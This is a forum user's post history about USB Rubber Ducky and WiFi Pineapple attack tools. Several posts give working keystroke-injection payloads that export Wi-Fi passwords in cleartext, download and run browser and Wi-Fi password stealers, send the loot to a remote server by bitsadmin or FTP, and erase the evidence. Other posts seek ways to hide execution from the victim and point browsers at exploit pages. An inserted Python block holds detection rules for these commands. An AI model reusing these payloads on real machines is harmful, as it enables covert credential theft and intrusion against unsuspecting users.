
crashie
Active Members
Posts: 48
Days Won: 2

Everything posted by crashie

  1. Sadly, a lot of stuff just "dies" from time to time.. people lose interest.. But I'm at least trying to do my part and deliver some payloads to the community.. working on some cool stuff regarding password dumping without any admin privileges. But it will take some time since I am looking into some flaws in Windows 7 currently.. Don't know if there are others still around working on new payloads.. Some seem to still be here.. I myself just got my ducky like a week ago.. :P Wonder if we can get this forum really active by releasing a 0day exploit in the form of a payload to the ducky.. ;) Take care now.. /crashie
  2. I will try that when I get back home and can use a PC, since my mac has another layout :P But I'll post the results. Thanks for all the other comments too. /crashie
  3. Here we hold SHIFT and press the key which has the UMLAUT (¨) symbol and caret (^) and after that a SPACE to get the ^. So there are three buttons involved to get the symbol in Windows. Here's a pic of the layout: http://upload.wikimedia.org/wikipedia/en/c/cf/Keyboard_Layout_Swedish.png If you press ALT and the same button you get a TILDE.
  4. Hi, wonder if anyone here can help solving a small problem regarding the Nordic keyboard layouts in Windows. Trying to get the correct reference to the symbol "^" (caret) but can't figure it out. The reference in the sv.properties, no.properties, dk.properties is incorrect. Have tried this:
     //ASCII_5E = CIRCUMFLEX_BITS + KEY_SPACE, MODIFIERKEY_SHIFT
     But it won't work.. still giving errors when the caret symbol is included in a script. Any help appreciated. /crashie
  5. Thanks! I've been playing around all weekend and am getting the hang of things now :P I am currently working on a browser stealer which is a command-line only one. A small executable that does not need any admin rights of course, it will be executed from the SD and export a .txt to the SD. There are many browser stealers out there but some get flagged by the AVs like Nirsoft's and others are too heavy in size because of a GUI.. And btw, take a look at the bitsadmin payload.. sending files over HTTP :P Will continue to put up all my work here, was first thinking of putting them on my website but hey.. it's all for the community :P /crashie
  6. This stealer script exports all the Wi-Fi passwords to the SD mounted in the rubber ducky. Requirement: This one is to be used with Twin Duck firmware.
     DELAY 1000
     ESCAPE
     CONTROL ESCAPE
     DELAY 400
     STRING cmd
     DELAY 400
     CTRL-SHIFT ENTER
     DELAY 400
     STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d
     DELAY 500
     ENTER
     DELAY 300
     STRING netsh wlan export profile folder=%myd%\ key=clear
     ENTER
     DELAY 500
     STRING exit
     ENTER
  7. Just made this little script/payload that exports the Wi-Fi passwords on Windows Vista/7/8 and combines and renames them to wipass.xml and then uploads via HTTP to a webserver running IIS with the BITS extension. This way there is no need to worry about UAC or stuff like that.. and since it's an HTTP upload the firewall won't ask questions.. :P Here's the script/payload:
     DELAY 1000
     ESCAPE
     CONTROL ESCAPE
     DELAY 400
     STRING cmd
     DELAY 400
     CTRL-SHIFT ENTER
     DELAY 400
     STRING netsh wlan export profile folder=%USERPROFILE%\ key=clear
     ENTER
     DELAY 200
     STRING copy /b %USERPROFILE%\*.xml %USERPROFILE%\wipass.xml
     STRING bitsadmin /transfer uloaded /upload /priority HIGH http://server.com/upload/wipass.xml %USERPROFILE%\wipass.xml
     ENTER
     DELAY 2200
     STRING erase /Q %USERPROFILE%\*.xml
     ENTER
     DELAY 200
     STRING exit
     ENTER
  8. Here's one contribution to add to the payload repository on the wiki. Feel free to use it. There is one thing to have in mind though, it only works with IIS servers which have enabled BITS transfers to an "upload" folder. But the code needed is tiny once you have set up a server to receive the file/files. Below is how I use it to download a Wi-Fi password decryptor which decrypts all the stored passwords on the target computer to a .htm file together with SSID. Then it uploads the .htm to my webserver and after that it deletes the password decryptor and the .htm file and exits. Bitsadmin is deprecated in Windows 7 but still there and running by default :) More commonly used in Vista and XP SP2. You can of course use it for other tools or executables that dump stuff to another file.. :) Requirement: An IIS server with BITS server extension enabled and configured. It's easy to set up, just drop me a PM and I'll assist you.
     REM ### BITSADMIN Download/Execute & Upload payload with file erase ### --- By crashie ---
     GUI R
     DELAY 200
     STRING cmd
     ENTER
     DELAY 600
     STRING bitsadmin /transfer myjob /download /priority high http://server.com/upload/wifipass.dba %TEMP%\wifi.exe &start %TEMP%\wifi.exe wipass.htm
     ENTER
     DELAY 3000
     ENTER
     STRING bitsadmin /transfer uloaded /upload /priority high http://server.com/upload/wipass.htm %USERPROFILE%\wipass.htm
     ENTER
     DELAY 3000
     STRING erase /Q %TEMP%\wifi.exe %UserProfile%\wipass.htm
     ENTER
     DELAY 50
     STRING exit
     ENTER
  9. Have put together different parts to get what I needed and it works. It may need some fine-tuning but it's the first payload I've run successfully that really does something :P (got my rubber ducky yesterday). What it does is that it downloads a browser password decryptor and executes it and saves the passwords to a .htm file and then it uploads the .htm to an FTP and when the upload is finished it quits and deletes the executable together with the .htm file containing all the passwords. This is how it looks, and yeah.. don't laugh :P It's my first attempt and I think you can guess what I will be doing this weekend :P I will try to make it upload the passwords to a server with PHP instead. But here's the script ready to run, well.. at least it works :P Any attempts to help with the fine tuning are welcome :) But I do as always.. learning by doing ;)
     GUI R
     DELAY 200
     STRING cmd
     ENTER
     DELAY 50
     STRING powershell (new-object System.Net.WebClient).DownloadFile('http://websitecom/file.dba','%TEMP%\pass.exe'); Start-Process "%TEMP%\pass.exe pass.htm"
     DELAY 50
     ENTER
     DELAY 2000
     STRING cd %USERPROFILE%
     ENTER
     DELAY 50
     STRING ftp
     ENTER
     DELAY 50
     STRING o
     ENTER
     DELAY 50
     STRING ftp.website.com 21
     ENTER
     DELAY 50
     STRING username
     ENTER
     DELAY 50
     STRING password
     ENTER
     DELAY 100
     STRING put pass.htm
     ENTER
     DELAY 1000
     STRING bye
     ENTER
     STRING erase /Q %TEMP%\pass.exe %UserProfile%\pass.htm
     ENTER
     DELAY 500
     STRING exit
     ENTER
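Defender-side counterpart to the payloads in posts 6 through 9 above: an added example (not from the forum or its author) that runs a few command-line detection rules over constructed process-creation records modelled on those commands. The rule names, the sample lines and the `\Temp\` heuristic are assumptions for illustration.

```python
import re
from typing import Dict, List

# Constructed sample process-creation records (command-line field only), modelled on
# the commands in the posts above; these are not real telemetry.
SAMPLE_CMDLINES = [
    r'netsh wlan export profile folder=E:\ key=clear',
    r'bitsadmin /transfer uloaded /upload /priority HIGH http://server.com/upload/wipass.xml C:\Users\bob\wipass.xml',
    r'bitsadmin /transfer myjob /download /priority high http://server.com/upload/wifipass.dba C:\Users\bob\AppData\Local\Temp\wifi.exe',
    r"powershell (new-object System.Net.WebClient).DownloadFile('http://websitecom/file.dba','C:\Users\bob\AppData\Local\Temp\pass.exe')",
    r'netsh wlan show interfaces',          # benign admin use of netsh
    r'bitsadmin /list /allusers',           # benign BITS job listing
]

# Each rule is (name, compiled regex). Matching is case-insensitive because cmd.exe
# accepts any casing (the error transcript in post 11 shows that too). Switches are
# anchored with a lookahead so "/upload" inside a URL path does not count as the switch.
RULES = [
    ("wifi_profile_export_cleartext",
     re.compile(r'\bnetsh\b.*\bwlan\b.*\bexport\b.*\bprofile\b.*\bkey=clear\b', re.I)),
    ("bitsadmin_upload",
     re.compile(r'\bbitsadmin\b.*/transfer(?=\s|$).*/upload(?=\s|$)', re.I)),
    ("bitsadmin_download_to_temp",
     re.compile(r'\bbitsadmin\b.*/transfer(?=\s|$).*/download(?=\s|$).*\\Temp\\', re.I)),
    ("powershell_webclient_downloadfile",
     re.compile(r'\bpowershell\b.*System\.Net\.WebClient.*\bDownloadFile\s*\(', re.I)),
]


def classify(cmdline: str) -> List[str]:
    """Return the names of all rules that fire on one command line (empty if none)."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Map each suspicious command line to its rule hits; benign lines are omitted."""
    hits: Dict[str, List[str]] = {}
    for line in cmdlines:
        matched = classify(line)
        if matched:
            hits[line] = matched
    return hits


if __name__ == "__main__":
    for line, rules in scan(SAMPLE_CMDLINES).items():
        print(", ".join(rules), "<-", line)
```

In practice the command-line field would come from Sysmon event 1 or Security event 4688 with command-line auditing enabled; the rules are deliberately narrow so the two benign lines do not fire.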
  10. Problem solved! And yeah, stupid me having CAPS on :P But that's how you learn, by making all the mistakes ;) Thanks!
  11. Hey, Have some issues with the ducky.. or most probably it's something I do wrong.. When I try to run the script below:
     REM Description: Change the users home page - simple but effective
     REM Author: PrikleyPaw
     REM ---- Command Prompt Admin DuckSauce v.02 ----
     ESCAPE
     CONTROL ESCAPE
     STRING cmd /T:01
     MENU
     STRING a
     DELAY 400
     ALT Y
     DELAY 200
     STRING @echo off && mode con:COLS=15 LINES=1 && title Installing Drivers
     ENTER
     DELAY 250
     REM Change www.yahoo.com to what ever you want their home page to be...
     REM Good to change to compromised page (beef, set, metasploit).
     STRING cmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d www.yahoo.com /f
     STRING exit
     ENTER
     I get this error message:
     Microsoft Windows [Version 6.1.7601]
     Copyright (c) 2009 Microsoft Corporation. All rights reserved.

     C:\Windows\system32>CMD /C reg add "hkey_current_user\sOFTWARE\mICROSOFT\iNTERNET eXPLORER\mAIN" /V "sTART pAGE" /D WWW.YAHOO.COM /FEXIT
     ERROR: Invalid syntax.
     Type "REG ADD /?" for usage.

     C:\Windows\system32>
  12. Hi and thanks for your response! So, whatever I do with the rubber ducky it will always be shown on the actual computer? And there is no way to hide the windows? I tried the RunEXE script (and have installed twin duck firmware (the special version 1 that runs the payload when CAPS is pressed) but when I did that it just opened up a hell of a lot of windows and the registry and some programs and did not execute my file.. So I don't know what went wrong there.. Appreciate any help given. And sorry for being such a newbie :P But one has to start somewhere ;) /crashie
  13. Hi, I'm new to the ducky, just got it today :P I am trying to get it to download an executable file over HTTP and then execute it. Have seen the payload called "Ducky Downloader" and it works, but not in the background, instead the CMD pops up and is visible the whole time until it's finished doing what it should do, download and execute. Isn't there a way to do this in the background so that it doesn't get noticed? Thanks in advance! / Crashie Btw, this is the script I'm talking about:
     ESCAPE
     CONTROL ESCAPE
     DELAY 400
     STRING cmd
     DELAY 400
     ENTER
     DELAY 400
     STRING copy con download.vbs
     ENTER
     STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/")))
     ENTER
     STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send()
     ENTER
     STRING If objXMLHTTP.Status = 200 Then
     ENTER
     STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open
     ENTER
     STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0
     ENTER
     STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a
     ENTER
     STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing
     ENTER
     STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing
     ENTER
     CTRL z
     ENTER
     STRING cscript download.vbs <INSERT URL HERE>
     ENTER
     STRING <INSERT EXE FILENAME HERE>
     ENTER
     STRING exit
     ENTER
  14. Well, as some of you already have said. If you work enough on it and read enough you WILL get it to work. Mine is working great now so all is solved! :P For any n00b out there who needs help with setting up their pineapple just let me know and I'll help out. Cheers!
  15. I've been trying everything on my Mac and read through the forums but can't get it right. Anyone here who can help me out? When I get it running I promise to write a step by step instruction so that you never have to do this again ;) I'm pretty stuck where I am now, been trying for hours but can't get it straight.. even bought a crossover cable but that doesn't help. I can connect to the unit itself with no problems. And I see it starting up some networks that I've used before on my iPhone that I try to use as a client to hijack it. But the iPhone never connects to the Internet and I have activated the ICS in OS X Lion from the wifi to the USB Ethernet adapter. When I start up the unit and have it plugged in to my mac the Internet connection drops on the mac (I am connected to a wireless router through the wifi-card on the mac). After a while the wireless adapter on the mac changes IP to the Pineapple's IP. My connection is set up this way:
     Macbook Air ---> connected to WiFi Router and ICS is enabled from WiFi to USB Ethernet adapter.
     Pineapple ----> connected to my Macbook Air's USB Ethernet port.
     Macbook Air USB Ethernet Adapter = IP: 192.168.2.1
     Pineapple = IP: 192.168.2.2, Gateway set to 192.168.2.1, DNS set to 192.168.2.1
     Anyone that can help me with what I am doing wrong? Cheers!
  16. Ok guys, I might not be the most clever here.. that's why I ask you for help. I've bought the Wifi Pineapple v2 at Defcon today and have brought it back home now. I have a Macbook Air running OS X Lion. If I connect the Pineapple to my mac's LAN port I can access it and start stuff like KARMA. Now, how do I get my Macbook Air's internet connection forwarded to the Pineapple? So others that are nearby connect to my pineapple and access internet through it? I've read many of the internet connection sharing threads but they don't make me any smarter. Do I need another Wi-Fi dongle to be able to get the clients who connect to the Pineapple an Internet connection? Or can they just use the one my Macbook Air uses? Like sharing it to the pineapple? I haven't ssh'd into the pineapple, it's configured as when I bought it. I also have Windows 7 running in VMware on this Macbook Air if that is easier to work with. Thanks in advance from a n00b who needs some first time help to get running. Cheers!